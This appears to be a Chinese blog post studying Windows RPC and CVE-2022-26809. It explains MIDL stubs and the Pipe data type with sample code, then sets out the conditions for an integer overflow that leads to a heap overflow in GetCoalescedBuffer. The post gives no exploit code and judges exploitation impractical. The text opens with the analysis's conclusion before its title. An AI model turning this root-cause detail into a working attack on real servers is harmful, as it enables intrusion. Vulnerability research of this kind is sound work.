Dispatch过程中，会首先对Pipe进行初始化，（没错，这个时候才会初始化pipe对象，也就是调用InitPipeStateWithType系列函数），之后会将RPC发送到InPipe（一个Server侧编写的函数，这边取个简单的名字）
InPipe通过调用NdrReadPipeElements，NdrReadPipeElements调用NdrpReadPipeElementsFromBuffer对数据进行读取。
当NdrpReadPipeElementsFromBuffer中，当前NDR中Pipe的元素耗尽的时候（其实据观察，应该是发生了分片的场合），发生NdrPartialReceive调用，表示当前需要将之前的缓存的Buffer读出来
当Receive调用的时候，此时由于未收到PFC_FRAG_LAST，调用未完成，于是进入Default分支，从而进入GetCoalescedBuffer分支。
再分支中，会依次将之前ProcessReceivedPDU读入的Buffer一次次记录下来。注意，MaxFrag只是用来控制Fragment的合并，不会导致当前叠加的退出。
所以可以存在如下的的场景:
假设size的大小合适的话

满足ProcessReceivedPDU接收到的包大小控制合适
满足GetCoalescedBuffer中判断的Size大小合适的话

当发生一次GetCoalsedcedBuffer就能造成溢出
8. 当接受过一次的包，如果满足大小小于size，此时的GetCoalescedBuffer线程会调用Event.Wait(-1)，此时会导致其他线程被激活，从而能够继续调用ProcessReceivedPDU，然后就能回到1调用。

调用示意图如下:

漏洞总结：

触发条件

RPC Server端存在一个Pipe类型的接口（这个Pipe是RPC里面定义的Pipe，不是命名管道那个），不妨叫做RPC_PIPE1
RPC Client往RPC_PIPE1发送【较大数据】，数据大小超出【client端设置的max_fragment】
RPC Server端会收到分片的数据包。当RPC Server收到数据包之后，存在两个判断值

1 2	Alloc Hint <- Client推荐Server分配的内存大小，可以远大于 Frag Size。限制最大为0xffffff Frag Size <- Client实际有效数据大小。通常小于Alloc Hint

当某次发送FragSize==AllocHint的时候，当前数据包被处理。之后的数据包进入缓存状态
4. 缓存状态下，存在一个缓存buffer（漏洞点）其长度为BufferLength。每次数据包进入缓存状态之后，都有

1 2	PutOnQueue(buffer, bufferLength); //临时存放到某个队列里面 BufferLength += FragSize

上述BufferLength存在整数溢出。
5. 当接收到最后一个数据包（标志位由Client设定）的时候，进入GetCoalescedBuffer函数，此时会申请一个BufferLength大小的堆，然后将之前压入Queue的数据包取出来，依次拷贝进去

理论上只要我们发送的fragment够多，BufferLength就会发生整数溢出，变成一个很小的值，此时我们取出来的数据包就能实现一个堆溢出攻击

POC？

实际上，一趟分析下来，感觉整个漏洞利用有一点点理想化了。可以看到如下的限制

服务端

服务端需要使用了Pipe结构
服务端需要主动修改Pipe Flag。实际上这个Flag从官方文档中并没有提到，而且再官方给出的编程说明中，也往往是推荐直接使用midl进行生成，这个时候根本就不会修改将当前标志位修改成可以被利用的状态

网络状态
从分析来看，至少需要溢出DWORD大小的数据，而关于fragment设置的大小，虽然规定大小是short大小，但是实际上尝试的时候发现，微软客户端会限制发送大小，单次只能发送5000字节，而如果要造成DWORD的数据发生溢出，至少要发送10000000左右个数据包才能造成溢出，而且RPC的库中，通常存在超时认证，也就是发送如此大数量的数据包，同时还不能因为超时被kill，感觉其难度非常的大。。。

总结

总的来说，这趟分析下来，感觉攻击利用的难度非常大：非常极端的服务器配置，非常高性能的请求要求，让人有点点不解为啥价值9.8的分数。。。可能是由于我能力比较差，只能分析到这个程度了，要是有大佬能够愿意指点就好了。

PS：全文提到的测试的代码源于微软官方仓库，相关的代码可以这里下载

参考链接

https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rpce/543b0019-e8ea-4b58-b4d5-324fd692966d
https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/ccc4fb75-1c86-41d7-bbc4-b278ec13bfb8
https://pubs.opengroup.org/onlinepubs/9629399/chap12.htm
https://pubs.opengroup.org/onlinepubs/9629399/chap14.htm
https://www.youtube.com/watch?v=GGlwy3_jVYE
https://www.rapid7.com/blog/post/2022/02/14/dropping-files-on-a-domain-controller-using-cve-2021-43893/
https://corelight.com/blog/another-day-another-dce-rpc-rce

Windows RPC Study

2022-04-30T02:18:07.000Z

之前MSRC微软放出了CVE-2022-26809这个漏洞，当时的评分有9.8那么高，我十分好奇这么高评分的漏洞到底是个怎么样子的洞，所以对其进行了简单的分析，不过一通分析过后，在个人有限的水平下，分析出来的结果是感觉这个漏洞好像挺理论洞的。。

为了能够更好的描述这个漏洞，首先要了解Windows下的RPC调用模式，所以这里可能要分成两个部分来讲漏洞。前面可能更加倾向于介绍RPC本身，摆出一堆术语，之后才能比较好的介绍漏洞本身。

RPC 基础知识

RPC为远程过程调用，分为Server端和Client端。其调用模式如图

由于RPC代码在编写过程中存在很多基本模式以及很多需要遵守的规则，所以一般开发平台提供一个叫做MIDL( Microsoft Interface Definition Language )的定义语言来生成Server和Client的对应接口，其后缀为.idl。当定义语言写好之后，使用midl.exe即可生成对应的桩(Stub)文件。桩（Stub）不做真正的工作，在RPC中它负责将调用的数据重新组织好，并且将数据传输到指定的远程主机侧完成系统调用。

在这里有很多微软提供的参考代码，可以通过这边学习一下整个RPC的调用过程。文章后面的内容也会从里面选取其中的Hello项目进行介绍。

实例：MIDL，与Stub的关系

假设interface文件如下

[ uuid (f691b703-f681-47dc-afcd-034b2faab911), // You must change this when you change the interface
  version(1.0),
  pointer_default(unique),
]
interface hello
{ 
void HelloProc([in] handle_t h1,
   [in, string] unsigned char * pszString);

void Shutdown([in] handle_t h1);
}

我们通过输入

1	midl -oldnames -cpp_opt "-E" hello.idl

可以生成如下的文件

1
2
3

hello.h   // 通用接口文件
hello_c.c // client端stub
hello_s.c // server端stub

可以简单看一下内容

hello.h

#ifdef __cplusplus
extern "C"{
#endif 


#ifndef __hello_INTERFACE_DEFINED__
#define __hello_INTERFACE_DEFINED__

/* interface hello */
/* [implicit_handle][unique][version][uuid] */ 

void HelloProc( 
    /* [in] */ handle_t h1,
    /* [string][in] */ unsigned char *pszString);

void Shutdown( 
    /* [in] */ handle_t h1);


extern handle_t hello_IfHandle;


extern RPC_IF_HANDLE hello_ClientIfHandle;
extern RPC_IF_HANDLE hello_ServerIfHandle;
#endif /* __hello_INTERFACE_DEFINED__ */

/* Additional Prototypes for ALL interfaces */

/* end of Additional Prototypes */

#ifdef __cplusplus
}

基本上是定义了一些基本的变量和对应的接口函数类型。其中

1 2	extern RPC_IF_HANDLE hello_ClientIfHandle; extern RPC_IF_HANDLE hello_ServerIfHandle;

为RPC调用中会使用到的接口句柄，其本质为RpcInterfaceInformation，也就是RPC接口信息句柄，在之后注册RPC调用的时候会用到。

client侧

Client侧生成的文件信息如下（节选）

static const RPC_CLIENT_INTERFACE hello___RpcClientInterface =
    {
    sizeof(RPC_CLIENT_INTERFACE),
    {{0xf691b703,0xf681,0x47dc,{0xaf,0xcd,0x03,0x4b,0x2f,0xaa,0xb9,0x11}},{1,0}}, // InterfaceId
    {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}}, // TransferSyntax
    0,  //DispatchTable
    0,
    0,
    0,
    0,
    0x00000000
    };
RPC_IF_HANDLE hello_ClientIfHandle = (RPC_IF_HANDLE)& hello___RpcClientInterface;

可以看到，hello_ClientIfHandle在这边被hello___RpcClientInterface赋值。这个变量中记录的了一些在定义过程中能够知道的值：当前接口的接口IDInterface ID以及当前NDR（在RPC调用过程中用于描述传输单位的数据）使用的传输语法 TransferSyntax。传输语法可以定义当前NDR使用的语法。在MIDL中可以使用/protocol对其进行指定。结构体后方的变量会在运行时逐渐填充。

extern const MIDL_STUB_DESC hello_StubDesc;

static RPC_BINDING_HANDLE hello__MIDL_AutoBindHandle;

static const MIDL_STUB_DESC hello_StubDesc = 
    {
    (void *)& hello___RpcClientInterface,
    MIDL_user_allocate,
    MIDL_user_free,
    &hello_IfHandle,
    0,
    0,
    0,
    0,
    hello__MIDL_TypeFormatString.Format,
    1, /* -error bounds_check flag */
    0x50002, /* Ndr library version */
    0,
    0x801026e, /* MIDL Version 8.1.622 */
    0,
    0,
    0,  /* notify & notify_flag routine table */
    0x1, /* MIDL flag */
    0, /* cs routines */
    0,   /* proxy/server info */
    0
    };

xxx_StubDesc变量中的xxxx为当前IDL文件中定义的接口的名字。这个变量存放了针对每个Stub的一些基本定义的。包括用于分配对象和释放对象的MIDL_user_allocate和MIDL_user_free。这两个程序需要在主程序中声明，用于对对象进行内存管理。通过暴露这个接口，也方便后期进行数据的追踪。同时将前文的hello___RpcClientInterface绑定在Stub中，表明hello_StubDesc描述的是hello___RpcClientInterface接口句柄指向的Stub。hello_IfHandle则为前文提到的，用于表示当前Stub的原始句柄。在通常情况下与hello___RpcClientInterface是等价的。但是当在接口中指明使用当权句柄的时候，一般会使用_IfHandle进行接口绑定。


static const hello_MIDL_PROC_FORMAT_STRING hello__MIDL_ProcFormatString =
    {
        0,
        {

/* Procedure HelloProc */

0x0,/* 0 */
0x48,/* Old Flags:  */
/*  2 */NdrFcLong( 0x0 ),/* 0 */
/*  6 */NdrFcShort( 0x0 ),/* 0 */
/*  8 */NdrFcShort( 0x10 ),/* X64 Stack size/offset = 16 */
/* 10 */0x32,/* FC_BIND_PRIMITIVE */
0x0,/* 0 */
/* 12 */NdrFcShort( 0x0 ),/* X64 Stack size/offset = 0 */
/* 14 */NdrFcShort( 0x0 ),/* 0 */
/* 16 */NdrFcShort( 0x0 ),/* 0 */
/* 18 */0x42,/* Oi2 Flags:  clt must size, has ext, */
0x1,/* 1 */
/* 20 */0xa,/* 10 */
0x1,/* Ext Flags:  new corr desc, */
/* 22 */NdrFcShort( 0x0 ),/* 0 */
/* 24 */NdrFcShort( 0x0 ),/* 0 */
/* 26 */NdrFcShort( 0x0 ),/* 0 */
/* 28 */NdrFcShort( 0x0 ),/* 0 */

/* Parameter pszString */

/* 30 */NdrFcShort( 0x10b ),/* Flags:  must size, must free, in, simple ref, */
/* 32 */NdrFcShort( 0x8 ),/* X64 Stack size/offset = 8 */
/* 34 */NdrFcShort( 0x4 ),/* Type Offset=4 */

/* Procedure Shutdown */

/* 36 */0x0,/* 0 */
0x48,/* Old Flags:  */
/* 38 */NdrFcLong( 0x0 ),/* 0 */
/* 42 */NdrFcShort( 0x1 ),/* 1 */
/* 44 */NdrFcShort( 0x8 ),/* X64 Stack size/offset = 8 */
/* 46 */0x32,/* FC_BIND_PRIMITIVE */
0x0,/* 0 */
/* 48 */NdrFcShort( 0x0 ),/* X64 Stack size/offset = 0 */
/* 50 */NdrFcShort( 0x0 ),/* 0 */
/* 52 */NdrFcShort( 0x0 ),/* 0 */
/* 54 */0x40,/* Oi2 Flags:  has ext, */
0x0,/* 0 */
/* 56 */0xa,/* 10 */
0x1,/* Ext Flags:  new corr desc, */
/* 58 */NdrFcShort( 0x0 ),/* 0 */
/* 60 */NdrFcShort( 0x0 ),/* 0 */
/* 62 */NdrFcShort( 0x0 ),/* 0 */
/* 64 */NdrFcShort( 0x0 ),/* 0 */

0x0
        }
    };

    static const hello_MIDL_TYPE_FORMAT_STRING hello__MIDL_TypeFormatString =
    {
        0,
        {
NdrFcShort( 0x0 ),/* 0 */
/*  2 */
0x11, 0x8,/* FC_RP [simple_pointer] */
/*  4 */
0x22,/* FC_C_CSTRING */
0x5c,/* FC_PAD */

0x0
        }
    };

static const unsigned short hello_FormatStringOffsetTable[] =
    {
    0,
    36
    };

hello__MIDL_ProcFormatString被称为格式化字符串（类似与printf用的的那个字符串），使用特定的数值来描述当前调用函数中接口的各种属性。包括当前接口类型（用flag表示）参数数量等。如果存在参数的画，则会在描述完接口之后跟着描述对应的参数类型,会描述参数的大小，种类等等。
hello__MIDL_TypeFormatString用于描述当前使用的一些函数的参数种类等
hello_FormatStringOffsetTable则用于描述hello__MIDL_ProcFormatString中每个接口的起始地址。

完成这些定义之后，最终就能声明接口函数


void HelloProc( 
    /* [in] */ handle_t h1,
    /* [string][in] */ unsigned char *pszString)
{

    NdrClientCall2(
                  ( PMIDL_STUB_DESC  )&hello_StubDesc,
                  (PFORMAT_STRING) &hello__MIDL_ProcFormatString.Format[0],
                  h1,
                  pszString);
    
}


void Shutdown( 
    /* [in] */ handle_t h1)
{

    NdrClientCall2(
                  ( PMIDL_STUB_DESC  )&hello_StubDesc,
                  (PFORMAT_STRING) &hello__MIDL_ProcFormatString.Format[36],
                  h1);
    
}

可以看到Client端的HelloProc和Shutdown函数定义本质上只是调用了一个叫做NdrClientCall2的API，这个API由RPCRT4.dll提供，根据生成的hello_StubDesc，hello__MIDL_ProcFormatString.Format[0]以及hello__MIDL_ProcFormatString.Format[36]进行函数调用接口和参数的一些定义。之后个根据这种特殊的格式化字符串形式，根据需要传入参数。

Server侧

server侧大部分关于接口的定义等同Client侧，但是接口的实现需要由自己完成，同时会多出如下的几个变量:


static const RPC_SERVER_INTERFACE hello___RpcServerInterface =
    {
    sizeof(RPC_SERVER_INTERFACE),
    {{0xf691b703,0xf681,0x47dc,{0xaf,0xcd,0x03,0x4b,0x2f,0xaa,0xb9,0x11}},{1,0}},
    {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},
    (RPC_DISPATCH_TABLE*)&hello_DispatchTable,
    0,
    0,
    0,
    &hello_ServerInfo,
    0x04000000
    };

static const RPC_DISPATCH_FUNCTION hello_table[] =
    {
    NdrServerCall2,
    NdrServerCall2,
    0
    };
static const RPC_DISPATCH_TABLE hello_DispatchTable = 
    {
    2,
    (RPC_DISPATCH_FUNCTION*)hello_table
    };

static const SERVER_ROUTINE hello_ServerRoutineTable[] = 
    {
    (SERVER_ROUTINE)HelloProc,
    (SERVER_ROUTINE)Shutdown
    };

static const MIDL_SERVER_INFO hello_ServerInfo = 
    {
    &hello_StubDesc,
    hello_ServerRoutineTable,
    hello__MIDL_ProcFormatString.Format,
    hello_FormatStringOffsetTable,
    0,
    0,
    0,
    0};

首先，server侧的hello___RpcServerInterface定义了DispatchTable。这个变量会在之后提到的PDU中由procnum指定的操作数指定调对应分发函数。然后对应的NdrServerCall2则会去寻找hello___RpcServerInterface中注册的hello_ServerInfo指定的hello_ServerRoutineTable，最终形成一种对应关系，找到需要调用的相关函数。在NdrServerCall2调用过程中，中途会根据之前注册的接口信息，再合适的时候进行内存管理（之后漏洞会详细分析部分），从而保证传入Server的API中的变量为我们需要的形式。
同时，Server侧需要实现接口:

void HelloProc(IN RPC_BINDING_HANDLE hBinding,unsigned char * pszString)
{
    printf_s("%s\n", pszString);
}

void Shutdown(IN RPC_BINDING_HANDLE hBinding)
{
    RPC_STATUS status;

    printf_s("Calling RpcMgmtStopServerListening\n");
    status = RpcMgmtStopServerListening(NULL);
    printf_s("RpcMgmtStopServerListening returned: 0x%x\n", status);
    if (status) {
       exit(status);
    }

    printf_s("Calling RpcServerUnregisterIf\n");
    status = RpcServerUnregisterIf(NULL, NULL, FALSE);
    printf_s("RpcServerUnregisterIf returned 0x%x\n", status);
    if (status) {
       exit(status);
    }
}

这边就没什么特别的了，就按照正常的API编写即可。

关于RPC的注册机制

[TODO]

特殊类型：Pipe

RPC接口中，支持很多常见的数据类型，例如int, long，char等等，同时也支持类似结构体的格式。详情可以看官方文档，介绍了所有可以用的类型。
这里我们要额外介绍一种特殊的数据类型：Pipe。Pipe这种数据类型能够实现如下的能力

The pipe type constructor is a highly efficient mechanism for passing large amounts of data, or any quantity of data that is not all available in memory at one time. By using a pipe, RPC run time handles the actual data transfer, eliminating the overhead associated with repeated remote procedure calls.

概括来讲就是：Pipe中的数据可以想在管道中流通一下，无数次的从某个特定的API中读入or输出。当发生读入or输出的动作的时候，传输的数据无需马上准备好，程序可以根据需要同步or异步的进行数据的输入。

这种类型在MIDL中的声明如下:


typedef pipe long LONG_PIPE;
void InPipe( [in] LONG_PIPE pipe_data );
void OutPipe( [out] LONG_PIPE *pipe_data ); 

void InOutPipe( [in, out] LONG_PIPE pipe_data);

首先我们需要使用typedef pipe long将pipe类型指定为一个我们新的变量类型上，表明当前管道中的pipe中，传输的元素全部都是long类型的变量。变量前的[in]表示被调用者（Server）将会用这个接口，从调用者（Client）**拖拽（Pull）数据。而[out]（后跟指针类型为自行需要），表示被调用者将会用这个接口往调用者处推送（Push）**数据。如果[in,out]都用，则表示这个接口中的数据可能极有可能发生pull也可能发生push。

头文件中的新增特征

观察生成头文件：


static const hello_MIDL_PROC_FORMAT_STRING hello__MIDL_ProcFormatString =
    {
        0,
        {

/* Procedure InPipe */

/* 66 */0x32,/* FC_BIND_PRIMITIVE */
0x48,/* Old Flags:  */
/* 68 */NdrFcLong( 0x0 ),/* 0 */
/* 72 */NdrFcShort( 0x2 ),/* 2 */
/* 74 */NdrFcShort( 0x8 ),/* X64 Stack size/offset = 8 */
/* 76 */NdrFcShort( 0x0 ),/* 0 */
/* 78 */NdrFcShort( 0x0 ),/* 0 */
/* 80 */0x48,/* Oi2 Flags:  has pipes, has ext, */
0x1,/* 1 */
/* 82 */0xa,/* 10 */
0x1,/* Ext Flags:  new corr desc, */
/* 84 */NdrFcShort( 0x0 ),/* 0 */
/* 86 */NdrFcShort( 0x0 ),/* 0 */
/* 88 */NdrFcShort( 0x0 ),/* 0 */
/* 90 */NdrFcShort( 0x0 ),/* 0 */

/* Parameter pipe_data */

/* 92 */NdrFcShort( 0xc ),/* Flags:  pipe, in, */
/* 94 */NdrFcShort( 0x0 ),/* X64 Stack size/offset = 0 */
/* 96 */NdrFcShort( 0x8 ),/* Type Offset=8 */

/* Procedure OutPipe */

/* 98 */0x32,/* FC_BIND_PRIMITIVE */
0x48,/* Old Flags:  */
/* 100 */NdrFcLong( 0x0 ),/* 0 */
/* 104 */NdrFcShort( 0x3 ),/* 3 */
/* 106 */NdrFcShort( 0x8 ),/* X64 Stack size/offset = 8 */
/* 108 */NdrFcShort( 0x0 ),/* 0 */
/* 110 */NdrFcShort( 0x0 ),/* 0 */
/* 112 */0x48,/* Oi2 Flags:  has pipes, has ext, */
0x1,/* 1 */
/* 114 */0xa,/* 10 */
0x1,/* Ext Flags:  new corr desc, */
/* 116 */NdrFcShort( 0x0 ),/* 0 */
/* 118 */NdrFcShort( 0x0 ),/* 0 */
/* 120 */NdrFcShort( 0x0 ),/* 0 */
/* 122 */NdrFcShort( 0x0 ),/* 0 */

/* Parameter pipe_data */

/* 124 */NdrFcShort( 0x4114 ),/* Flags:  pipe, out, simple ref, srv alloc size=16 */
/* 126 */NdrFcShort( 0x0 ),/* X64 Stack size/offset = 0 */
/* 128 */NdrFcShort( 0x16 ),/* Type Offset=22 */

/* Procedure InOutPipe */

/* 130 */0x32,/* FC_BIND_PRIMITIVE */
0x48,/* Old Flags:  */
/* 132 */NdrFcLong( 0x0 ),/* 0 */
/* 136 */NdrFcShort( 0x4 ),/* 4 */
/* 138 */NdrFcShort( 0x8 ),/* X64 Stack size/offset = 8 */
/* 140 */NdrFcShort( 0x0 ),/* 0 */
/* 142 */NdrFcShort( 0x0 ),/* 0 */
/* 144 */0x48,/* Oi2 Flags:  has pipes, has ext, */
0x1,/* 1 */
/* 146 */0xa,/* 10 */
0x1,/* Ext Flags:  new corr desc, */
/* 148 */NdrFcShort( 0x0 ),/* 0 */
/* 150 */NdrFcShort( 0x0 ),/* 0 */
/* 152 */NdrFcShort( 0x0 ),/* 0 */
/* 154 */NdrFcShort( 0x0 ),/* 0 */

/* Parameter pipe_data */

/* 156 */NdrFcShort( 0x1c ),/* Flags:  pipe, in, out, */
/* 158 */NdrFcShort( 0x0 ),/* X64 Stack size/offset = 0 */
/* 160 */NdrFcShort( 0x20 ),/* Type Offset=32 */

0x0
        }
    };

static const hello_MIDL_TYPE_FORMAT_STRING hello__MIDL_TypeFormatString =
    {
        0,
        {
NdrFcShort( 0x0 ),/* 0 */
/*  2 */
0x11, 0x8,/* FC_RP [simple_pointer] */
/*  4 */
0x22,/* FC_C_CSTRING */
0x5c,/* FC_PAD */
/*  6 */0x8,/* FC_LONG */
0x5c,/* FC_PAD */
            // 从这里开始才是pip的定义
/*  8 */0xb5,/* FC_PIPE 也就是pipe的魔数*/
0x3,/* 3 非常重要的符号位，后面要考*/
/* 10 */NdrFcShort( 0xfffc ),/* Offset= -4 (6) */
/* 12 */NdrFcShort( 0x4 ),/* 4 */
/* 14 */NdrFcShort( 0x4 ),/* 4 */
/* 16 */
0x11, 0x4,/* FC_RP [alloced_on_stack] */
/* 18 */NdrFcShort( 0x4 ),/* Offset= 4 (22) */
/* 20 */0x8,/* FC_LONG */
0x5c,/* FC_PAD */
/* 22 */0xb5,/* FC_PIPE */
0x3,/* 3 */
/* 24 */NdrFcShort( 0xfffc ),/* Offset= -4 (20) */
/* 26 */NdrFcShort( 0x4 ),/* 4 */
/* 28 */NdrFcShort( 0x4 ),/* 4 */
/* 30 */0x8,/* FC_LONG */
0x5c,/* FC_PAD */
/* 32 */0xb5,/* FC_PIPE */
0x3,/* 3 */
/* 34 */NdrFcShort( 0xfffc ),/* Offset= -4 (30) */
/* 36 */NdrFcShort( 0x4 ),/* 4 */
/* 38 */NdrFcShort( 0x4 ),/* 4 */

0x0
        }
    };

删除部分无用变量

可以看到，生成的Server Stub文件中，多出来一些针对Pipe的特殊声明。我们能够使用这里的特征，对所有使用了RPC调用的binary进行搜索，检查其中是否包含pipe类型。其中这里可以稍微关注一下pipe的属性
[TODO:考虑删掉，改成逆向结果]


00000000 PipeInit        struc ; (sizeof=0x14, align=0x4, mappedto_440)
00000000 gap0            db ?
00000001 PipeFlag        db ?
00000002                 db ? ; undefined
00000003                 db ? ; undefined
00000004 AnotherSize     dw ?
00000006 unsigned___int166 dw ?
00000008 targetSize      dd ?
0000000C dwordC          dd ?
00000010 dword10         dd ?
00000014 PipeInit        ends
00000014
    

/*  8 */0xb5,/* FC_PIPE 对应FC 也就是pipe的魔数*/
0x3,/* 3 对应【pipe符号位】，后面要考*/
/* 10 */NdrFcShort( 0xfffc ),/* Offset= -4 (6) 对应field_2 */
/* 12 */NdrFcShort( 0x4 ),/* 4 对应AnotherSize，根据pipe，其占用空间大小可变*/
/* 14 */NdrFcShort( 0x4 ),/* 4 对应targetSize，根据pipe，其占用空间大小可变*/
/* 16 */
0x11, 0x4,/* FC_RP [alloced_on_stack] */
/* 18 */NdrFcShort( 0x4 ),/* Offset= 4 (22) */
/* 20 */0x8,/* FC_LONG */
0x5c,/* FC_PAD */

Pipe会在InitPipeStateWithType函数中被初始化。其中flag最高位会表示当前大小AnotherSize和targetSize是两个字节还是四个字节。默认情况下的targetSize会在NdrReadPipeElements被抬高为64字节（这也就是GetCoalescedBuffer在后期攻击的时候，为什么不会被重复调用的理由）。但是当设置flag最高位为1的场合，这个值最大可以设置为0x7fffff00。不过此时AnotherSize也需要保持一样的大小。

Server侧代码编写


#define PIPE_TRANSFER_SIZE 0x100 /* Transfer 100 pipe elements at one time */
#pragma comment(lib, "rpcrt4.lib")
#define BUF_SIZE 0x100
#define PIPE_SIZE 0x100
#define IN_VALUE 0x40

typedef  unsigned long ulong;
typedef void* rpc_ss_pipe_state_t;
// extern RPC_IF_HANDLE PIPEDemo_ServerIfHandle;


void InPipe(LONG_PIPE  long_pipe)
{
    long local_pipe_buf[PIPE_TRANSFER_SIZE];
    ulong actual_transfer_count = PIPE_TRANSFER_SIZE;

    while (actual_transfer_count > 0) /* Loop to get all
                                        the pipe data elements */
    {
        int count = PIPE_TRANSFER_SIZE / 2;
        printf("Each count size is %d\n", count);
        long_pipe.pull(long_pipe.state,
            local_pipe_buf,
            count,
            &actual_transfer_count);
        /* process the elements */
        printf("Server has receive %d item!\n",actual_transfer_count);
    } // end while
    printf("And the first ten item is :\n");
    for(int i = 0; i < 10; i++)
    {
        printf("%d,", local_pipe_buf[i]);
    }
    puts("\n");
} //end InPipe

void OutPipe(LONG_PIPE* outputPipe)
{
    long* outputPipeData;
    ulong index = 0;
    ulong elementsToSend = PIPE_TRANSFER_SIZE;

    /* Allocate memory for the data to be passed back in the pipe */
    if (outputPipe == NULL)
    {
        return;
    }

    outputPipeData = (long*)malloc(sizeof(long) * PIPE_SIZE);

    for(int i = 0; i < PIPE_SIZE; i++)
    {
        outputPipeData[i] = i;
    }
    while (elementsToSend > 0) /* Loop to send pipe data elements */
    {
        if (index >= PIPE_SIZE)
            elementsToSend = 0;
        else
        {
            if ((index + PIPE_TRANSFER_SIZE) > PIPE_SIZE)
                elementsToSend = PIPE_SIZE - index;
            else
                elementsToSend = PIPE_TRANSFER_SIZE;
        }

        outputPipe->push(outputPipe->state,
            &(outputPipeData[index]),
            elementsToSend);
        index += elementsToSend;

    } //end while

    free((void*)outputPipeData);

}

void InOutPipe( LONG_PIPE pipe_data)
{
    printf("First enter InPipe\n");
    InPipe(pipe_data);
    printf("Next enter OutPipe\n");
    OutPipe(&pipe_data);
}

再编写Server侧代码的时候，首先注意，当前传入的LONG_PIPE对象无需我们初始化，因为实际上pipe对象具体要怎么做是交给用户态来定义的。
InPipe接口中，我们调用了pull接口

while (actual_transfer_count > 0) /* Loop to get all
                                        the pipe data elements */
{
    int count = PIPE_TRANSFER_SIZE / 2;
    printf("Each count size is %d\n", count);
    long_pipe.pull(long_pipe.state,
        local_pipe_buf,
        count,
        &actual_transfer_count);
    /* process the elements */
    printf("Server has receive %d item!\n",actual_transfer_count);
} // end while

state用于描述当前管道中的状态值，这里我们用它代表了下标（client侧体现）
local_pipe_buf用于存放当前用于存放收入数据的缓冲区
count表示pipe单次接受的pipe中元素大小，这里也就是能接受count个long类型
actual_transfer_count表示实际接受了多少个元素

当我们发现接收到的数据大小为0的时候，此时停止循环，完成pipe数据读取。
OutPipe接口也类似

while (elementsToSend > 0) /* Loop to send pipe data elements */
   {
     if (index >= PIPE_SIZE)
         elementsToSend = 0;
     else
     {
         if ((index + PIPE_TRANSFER_SIZE) > PIPE_SIZE)
             elementsToSend = PIPE_SIZE - index;
         else
             elementsToSend = PIPE_TRANSFER_SIZE;
     }

     outputPipe->push(outputPipe->state,
         &(outputPipeData[index]),
         elementsToSend);
     index += elementsToSend;

 } //end while

只不过这次我们会按照一定的比率进行数据的输送。

Client侧

Client侧的逻辑稍微复杂，且需要和Server侧颠倒

void PipeAlloc(rpc_ss_pipe_state_t stateInfo,
    ulong requestedSize,
    long** allocatedBuffer,
    ulong* allocatedSize)
{
    printf("request size is %d\n", requestedSize);
    ulong* state = (ulong*)stateInfo;
    if (requestedSize > (BUF_SIZE * sizeof(long)))
    {
        *allocatedSize = BUF_SIZE * sizeof(long);
    }
    else
    {
        *allocatedSize = requestedSize;
    }
    *allocatedBuffer = globalBuffer;
} //end PipeAlloc

void PipePull(rpc_ss_pipe_state_t stateInfo,
    long* inputBuffer,
    ulong maxBufSize,
    ulong* sizeToSend)
{
    ulong currentIndex;
    ulong i;
    ulong elementsToRead;
    ulong* state = (ulong*)stateInfo;

    currentIndex = *state;
    printf("Max Buffer size is %d\n",maxBufSize);
    printf("currentIndex is %d\n",currentIndex);
    if (*state >= PIPE_SIZE)
    {
        *sizeToSend = 0; /* end of pipe data */
        *state = 0; /* Reset the state = global index */
    }
    else
    {
        if (currentIndex + maxBufSize > PIPE_SIZE)
            elementsToRead = PIPE_SIZE - currentIndex;
        else
            elementsToRead = maxBufSize;

        for (i = 0; i < elementsToRead; i++)
        {
            /*client sends data */
            inputBuffer[i] = globalSendPipeData[i + currentIndex];
        }

        printf("Now send %d element to server\n", elementsToRead);
        *state += elementsToRead;
        *sizeToSend = elementsToRead;
    }
}//end PipePull
void PipePush(rpc_ss_pipe_state_t stateInfo,
    long* buffer,
    ulong numberOfElements)
{
    ulong elementsToCopy, i;
    ulong* state = (ulong*)stateInfo;

    if (numberOfElements == 0)/* end of data */
    {
        printf("Receive the final one\n");
        *state = 0; /* Reset the state = global index */
    }
    else
    {
        // state is the like the index of the push offset
        if (*state + numberOfElements > PIPE_SIZE)
            elementsToCopy = PIPE_SIZE - *state;
        else
            elementsToCopy = numberOfElements;

        for (i = 0; i < elementsToCopy; i++)
        {
            /*client receives data */
            globalRecvPipeData[*state] = buffer[i];
            (*state)++;
        }
        printf("Receive from server, the first 10 is \n");
        for(int i = 0; i< 10; i++)
        {
            printf("%d,", globalRecvPipeData[i]);
        }
        puts("\n");
    }
}//end PipePush

首先可以看到，这里首先定义了三个和pipe相关的函数。之后这三个函数会分别被赋值给传入Client侧的InPipe和OutPipe中的LONG_PIPE对象中。这里先解释其作用

PipeAlloc会在每次pipe_pull和pipe_push被调用的时候，给allocatedBuffer申请变量，而且必须在allocatedSize给出反馈。注意这个allocatedBuffer只需要在用户态可用即可，未规定一定要是malloc出来的内容。例子中就简单的使用全局变量进行了分配
PipePull中传入的inputBuffer为PipeAlloc中申请的Buffer，然后我们往Buffer中写入我们需要传入的内容。这里的stateInfo其实是一个整数变量，用于维护Pipe的状态，我们在这里用于表示当前Pipe的下标，记录传输的状态。完成传输之后，需要将要发送的数据数量存入sizeToSend
PipePush中buffer同样为PipeAlloc申请来的数据大小。这边而是表示此时有numberOfElements个对象需要接受，此时只需要将数据传入对应state表示的下标即可

完成上述准备，此时可以编写用于发送数据和接受数据的函数

void SendLongs()
{
    LONG_PIPE inPipe;
    int i;
    globalSendPipeData =
        (long*)malloc(sizeof(long) * PIPE_SIZE);

    for (i = 0; i < PIPE_SIZE; i++)
        globalSendPipeData[i] = 0x42424242;

    pipeDataIndex = 0;
    inPipe.state = (rpc_ss_pipe_state_t)&pipeDataIndex;
    inPipe.pull = PipePull;
    inPipe.alloc = PipeAlloc;

    printf("Using inpipe seding....\n");
    InPipe(inPipe); /* Make the rpc */

    free((void*)globalSendPipeData);

}//end SendLongs
void ReceiveLongs()
{
    LONG_PIPE outputPipe;
    //idl_long_int i;

    globalRecvPipeData =
        (long*)malloc(sizeof(long) * PIPE_SIZE);

    pipeDataIndex = 0;
    outputPipe.state = (rpc_ss_pipe_state_t)&pipeDataIndex;
    outputPipe.push = PipePush;
